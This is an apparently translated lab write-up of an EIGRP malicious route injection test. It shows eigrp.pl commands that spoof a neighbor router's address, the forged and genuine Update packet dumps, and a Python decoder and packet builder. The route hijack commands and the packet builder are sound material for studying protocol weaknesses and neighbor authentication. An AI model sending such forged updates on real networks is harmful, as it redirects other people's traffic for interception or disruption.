EIGRP Malicious Route Injection and Denial-of-Service Attack Test (Part 2)
III. Injecting a malicious route
First, a recap of the EIGRP property this attack relies on. To keep the bandwidth consumed by the routing protocol to a minimum, DUAL does not periodically re-advertise the whole routing table the way classic distance-vector protocols do; it sends triggered, partial updates: when a route changes locally, only the changed route is advertised. For our purposes this means that once R0 has accepted a route we push into it, it keeps that route for as long as the adjacency with 192.168.1.249 stays alive (hellos keep arriving and nothing triggers a change for that prefix); only when the hello timer for R1 expires and the adjacency is reset does R0 renegotiate and re-learn the topology.
1. First, the routing tables of both routers under normal conditions:
R0#sh ip route
Gateway of last resort is not set
D 172.16.0.0/16 [90/307200] via 192.168.1.249, 20:55:19, FastEthernet0/0
C 192.168.1.0/24 is directly connected, FastEthernet0/0
R1#sh ip route
Gateway of last resort is not set
172.16.0.0/16 is variably subnetted, 2 subnets, 2 masks
C 172.16.0.0/24 is directly connected, FastEthernet0/1
D 172.16.0.0/16 is a summary, 21:14:43, Null0
C 192.168.1.0/24 is directly connected, FastEthernet0/0
R0 has learned one advertisement from R1, because R1 has the 172.16.0.0/24 network directly connected and advertises it as a 172.16.0.0/16 summary.
2. Next, the attacker sends the malicious routing update:
./eigrp.pl --update --internal --source 192.168.1.249 --routedest 172.16.0.0/16 --nexthop 192.168.1.36
Here --update means send an Update packet, --internal marks the advertisement as an EIGRP internal route, --source is the spoofed address of the router that appears to send the update, --routedest is the route to inject, and --nexthop is the next-hop address for the injected route.
Note from 水煮豆豆: one thing to watch out for: RawIP.pm in the attacker's Perl environment performs a strict check of the network configuration; if the host address and the gateway are not within the same subnet mask, or no gateway exists at all, it fails with the following error:
Let's look at the result first.
Sniffing the malicious routing packet we sent:
***************************************************************
Source MAC:000c29c57e29 Dest MAC:01005e00000a
Source IP: 192.168.1.249 Dest IP:224.0.0.10
****************************************************************
HexDump (high nybble first):
02 01 01 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 02 00 1c c0
a8 01 24 00 00 2e e0 00 00 01 00 00 05 ea 01 ff 01 00 00 10 ac 10 00
Version: 2
Opcode:01 <Update>
Checksum: 0x17e <* Correct *>
Flags: 0 Sequence: 0
Acknowledge: 0
Autonomous system number: 1
<<<IP internal route: 0102 >>>
Size: 28
Next hop: 192.168.1.36
Delay: 12000 Bandwidth: 256
MTU: 1514 Hop count: 1
Reliability:255 Load: 1
Reserved 0
Prefix Length: 16
Destination: 172.16.0.
What goes out on the wire is an EIGRP Update packet carrying our malicious route.
Now check router R0:
R0#sh ip route
Gateway of last resort is 192.168.1.36 to network 0.0.0.0
D 172.16.0.0/16 [90/293600] via 192.168.1.36, 00:00:17, FastEthernet0/0
C 192.168.1.0/24 is directly connected, FastEthernet0/0
D* 0.0.0.0/0 [90/319200] via 192.168.1.36, 00:00:17, FastEthernet0/0
The route that previously pointed to .249 now points to .36, i.e. to the attacker: R0 now forwards traffic for the 172.16.0.0/16 network to us.
As long as the neighbor .249 stays up, R0 keeps this route until the adjacency fails. Note that R0 accepted the update purely because it arrived from an address it considers a neighbor; without EIGRP neighbor authentication (MD5, or HMAC-SHA-256 in named mode on newer IOS) nothing ties the update to the real R1.
Now a question arises: we injected an internal route, so why does a default route pointing to .36 appear as well?
Further investigation: why is an extra default route inserted?
Compare with a normal update coming from R1:
***************************************************************
Source MAC:c2040d400000 Dest MAC:01005e00000a
Source IP: 192.168.1.249 Dest IP:224.0.0.10
****************************************************************
HexDump (high nybble first):
02 01 b4 ac 00 00 00 0a 00 00 00 72 00 00 00 00 00 00 00 01 01 02 00 1b 00
00 00 00 00 00 64 00 00 03 e8 00 00 05 dc 00 ff 01 00 00 10 ac 10
Version: 2
Opcode:01 <Update>
Checksum: 0xb4ac <* Correct *>
Flags: 10 Sequence: 114
Acknowledge: 0
Autonomous system number: 1
<<<IP internal route: 0102 >>>
Size: 27
Next hop: 0.0.0.0
Delay: 25600 Bandwidth: 256000
MTU: 1500 Hop count: 0
Reliability:255 Load: 1
Reserved 0
Prefix Length: 16
Destination: 172.16..
The most conspicuous difference between the genuine update and our forged one is the next-hop field: R1 sends 0.0.0.0, we sent 192.168.1.36. (The dumps differ elsewhere too: the forged TLV is 28 bytes instead of 27 because eigrp.pl emits three destination bytes for a /16 where R1 sends two; the delay, bandwidth, MTU and hop-count values differ; and R1's packet carries flags 0x0a and sequence 114 while the forged packet has flags 0 and sequence 0.) Why would this difference make the forged update install a default route when the genuine one does not? Let's change the forged next hop as well:
./eigrp.pl --update --internal --source 192.168.1.249 --routedest 172.16.0.0/16 --nexthop 0.0.0.0
With the nexthop parameter changed, the result becomes:
D 172.16.0.0/16 [90/293600] via 192.168.1.249, 00:00:02, FastEthernet0/0
C 192.168.1.0/24 is directly connected, FastEthernet0/0
D* 0.0.0.0/0 [90/319200] via 192.168.1.249, 00:00:02, FastEthernet0/0
The default route is still present, but it now points to .249 rather than .36. This part is expected: a next hop of 0.0.0.0 in an EIGRP route TLV means "use the IP source address of the packet", and our packet's source is spoofed as 192.168.1.249, so the router is not choosing among 0.0.0.0, 192.168.1.36 and 192.168.1.249 by picking the largest address. Why a default route gets installed at all remains an open question.
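To make the two dumps above concrete (the forged update from eigrp.pl and R1's genuine update), here is an added Python decoder; it is not code from the original post and not part of eigrp.pl. It parses the EIGRP header and the IP internal route TLV, verifies the checksum, rebuilds each packet byte-for-byte from the decoded fields, resolves a 0.0.0.0 next hop the way a receiving router does, and recomputes the classic composite metric R0 installed. The R0 interface values fed to the metric calculation (bandwidth 10000 kbit and delay 1000 microseconds on FastEthernet0/0) are an assumption chosen so that the results match the 307200 and 293600 shown in R0's routing table; the post does not state them.

```python
"""Decode, rebuild and cross-check the two classic EIGRP Update packets captured
in this post. Added example; not code from the original post nor from eigrp.pl."""
import ipaddress
import struct

# EIGRP payloads copied from the dumps above: the forged update sent by
# eigrp.pl (IP source spoofed as 192.168.1.249) and the genuine update from R1.
FORGED_HEX = ("02 01 01 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 02 00 1c c0 "
              "a8 01 24 00 00 2e e0 00 00 01 00 00 05 ea 01 ff 01 00 00 10 ac 10 00")
GENUINE_HEX = ("02 01 b4 ac 00 00 00 0a 00 00 00 72 00 00 00 00 00 00 00 01 01 02 00 1b 00 "
               "00 00 00 00 00 64 00 00 03 e8 00 00 05 dc 00 ff 01 00 00 10 ac 10")

HEADER = struct.Struct("!BBHIIII")  # version, opcode, checksum, flags, sequence, ack, AS
TLV_HEADER = struct.Struct("!HH")   # type, length (length includes these 4 bytes)
TLV_INTERNAL_ROUTE = 0x0102


def ones_complement_checksum(data: bytes) -> int:
    """RFC 1071 checksum over the whole packet; odd lengths are zero-padded."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def parse_internal_route(value: bytes) -> dict:
    """Decode the value of an IP internal route TLV (the bytes after type/length)."""
    next_hop, delay, bandwidth = struct.unpack("!4sII", value[:12])
    prefix_len, dest = value[20], value[21:]
    needed = (prefix_len + 7) // 8  # bytes a sender actually needs for this prefix
    network = ipaddress.IPv4Network((dest[:needed].ljust(4, b"\x00"), prefix_len), strict=False)
    return {"next_hop": str(ipaddress.IPv4Address(next_hop)),
            "delay": delay,            # scaled: 10-microsecond units * 256
            "bandwidth": bandwidth,    # scaled: (10^7 / kbit) * 256
            "mtu": int.from_bytes(value[12:15], "big"),
            "hop_count": value[15], "reliability": value[16], "load": value[17],
            "prefix_len": prefix_len, "destination": str(network),
            "extra_dest_bytes": len(dest) - needed}  # >0: the sender padded the prefix


def parse_update(hex_dump: str) -> dict:
    """Parse the header and internal-route TLVs; checksum_ok verifies the sender's checksum."""
    pkt = bytes.fromhex(hex_dump)
    version, opcode, checksum, flags, seq, ack, asn = HEADER.unpack_from(pkt, 0)
    routes, offset = [], HEADER.size
    while offset + TLV_HEADER.size <= len(pkt):
        tlv_type, tlv_len = TLV_HEADER.unpack_from(pkt, offset)
        if tlv_len < TLV_HEADER.size or offset + tlv_len > len(pkt):
            raise ValueError("malformed TLV length")
        if tlv_type == TLV_INTERNAL_ROUTE:
            route = parse_internal_route(pkt[offset + TLV_HEADER.size:offset + tlv_len])
            route["tlv_len"] = tlv_len
            routes.append(route)
        offset += tlv_len
    zeroed = pkt[:2] + b"\x00\x00" + pkt[4:]  # checksum is computed with its field zeroed
    return {"version": version, "opcode": opcode, "flags": flags, "sequence": seq,
            "ack": ack, "as": asn, "checksum": checksum, "routes": routes,
            "checksum_ok": ones_complement_checksum(zeroed) == checksum}


def build_update(asn: int, routes: list, flags: int = 0, seq: int = 0, ack: int = 0) -> bytes:
    """Rebuild an Update with one internal-route TLV per route dict (keys as returned
    by parse_internal_route); extra_dest_bytes controls padding of the destination."""
    body = b""
    for r in routes:
        n_dest = (r["prefix_len"] + 7) // 8 + r.get("extra_dest_bytes", 0)
        value = (ipaddress.IPv4Address(r["next_hop"]).packed
                 + struct.pack("!II", r["delay"], r["bandwidth"])
                 + r["mtu"].to_bytes(3, "big")
                 + bytes([r["hop_count"], r["reliability"], r["load"], 0, 0, r["prefix_len"]])
                 + ipaddress.IPv4Address(r["destination"].split("/")[0]).packed[:n_dest])
        body += TLV_HEADER.pack(TLV_INTERNAL_ROUTE, TLV_HEADER.size + len(value)) + value
    header = HEADER.pack(2, 1, 0, flags, seq, ack, asn)  # opcode 1 = Update, checksum 0
    csum = ones_complement_checksum(header + body)
    return header[:2] + struct.pack("!H", csum) + header[4:] + body


def effective_next_hop(route: dict, sender_ip: str) -> str:
    """A next hop of 0.0.0.0 tells the receiver to use the packet's IP source address."""
    return sender_ip if route["next_hop"] == "0.0.0.0" else route["next_hop"]


def composite_metric(route: dict, iface_bw_kbit: int, iface_delay_usec: int) -> int:
    """Classic metric with default K values (K1 = K3 = 1): the slowest link's bandwidth
    term (largest scaled value on the path) plus the sum of scaled delays."""
    iface_bw_scaled = (10**7 // iface_bw_kbit) * 256
    iface_delay_scaled = (iface_delay_usec // 10) * 256
    return max(route["bandwidth"], iface_bw_scaled) + route["delay"] + iface_delay_scaled
```

Running parse_update on both dumps confirms both checksums are valid, shows the forged TLV is 28 bytes with a padded third destination byte against R1's 27, and composite_metric returns 293600 for the forged route and 307200 for the genuine one, matching R0's table. build_update reproduces the captured bytes exactly, which is a handy check when writing either a custom sender or a detection signature for this kind of packet.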
This article was reposted from the 51CTO blog of beansprouts; original link: http://blog.51cto.com/netwalk/128211. Please contact the original author for permission to reprint.